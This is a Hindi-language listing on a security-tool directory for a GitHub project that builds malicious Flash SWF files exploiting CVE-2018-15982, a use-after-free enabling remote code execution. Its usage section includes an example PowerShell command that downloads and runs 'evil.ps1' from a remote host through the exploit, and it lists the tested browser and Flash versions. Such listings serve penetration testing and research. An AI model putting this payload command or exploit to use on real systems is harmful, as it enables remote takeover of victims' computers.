Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
adobe-flash-cve2018-15982 — # SWF पेलोड उत्पन्न करने के लिए Metasploit मॉड्यूल और Python स्क्रिप्ट जो CVE-2018-15982 का शोषण करती है, जो Adobe Flash Player में एक use-after-free भेद्यता है जो रिमोट कोड निष्पादन को सक्षम बनाती है। | Kitploit
उपकरण/GitHubGitHub/kphongagsorn/adobe-flash-cve2018-15982
शोषण फ्रेमवर्कपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषण
GitHubkphongagsorn/adobe-flash-cve2018-15982

adobe-flash-cve2018-15982

# SWF पेलोड उत्पन्न करने के लिए Metasploit मॉड्यूल और Python स्क्रिप्ट जो CVE-2018-15982 का शोषण करती है, जो Adobe Flash Player में एक use-after-free भेद्यता है जो रिमोट कोड निष्पादन को सक्षम बनाती है।

रिपॉजिटरी देखें
115226 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

एडोब फ्लैश CVE-2018-15982

यह स्क्रिप्ट CVE-2018-15982 के लिए एक swf पेलोड बनाती है, जो https://github.com/smgorelik/Windows-RCE-exploits से PoC पर आधारित है। यह भेद्यता Gigamon ATR के Chenming Xu और Ed Miles द्वारा खोजी गई थी।

यह भेद्यता एक उपयोग-के-बाद-मुक्त (use-after-free) दोष है जो फ्लैश में मनमाना कोड निष्पादन सक्षम बनाता है। अधिक जानकारी नीचे दिए गए लिंक में मिल सकती है।

  • https://threatpost.com/adobe-patches-zero-day-vulnerability-in-flash-player/139629/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-15982

नोट: वर्तमान में केवल एक ब्लॉक स्प्रे कर रहा है, मैंने स्क्रिप्ट बनाने के बाद यह देखा।

उपयोग:

python create_swf.py <command> <output file name>

उदाहरण उपयोग:

python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf

परीक्षण किया गया:

  • विंडोज 10 एंटरप्राइज 10.0.17134, इंटरनेट एक्सप्लोरर 11.285.17134.0
  • एडोब फ्लैश 31.0.0.153, 29.0.0.140

उदाहरण

पेलोड बनाएं:

alt text

पेलोड निष्पादित करना:

alt text

निष्पादन की पुष्टि करें:

alt text

मेटास्प्लॉइट मॉड्यूल

alt text

टूल डाउनलोड करें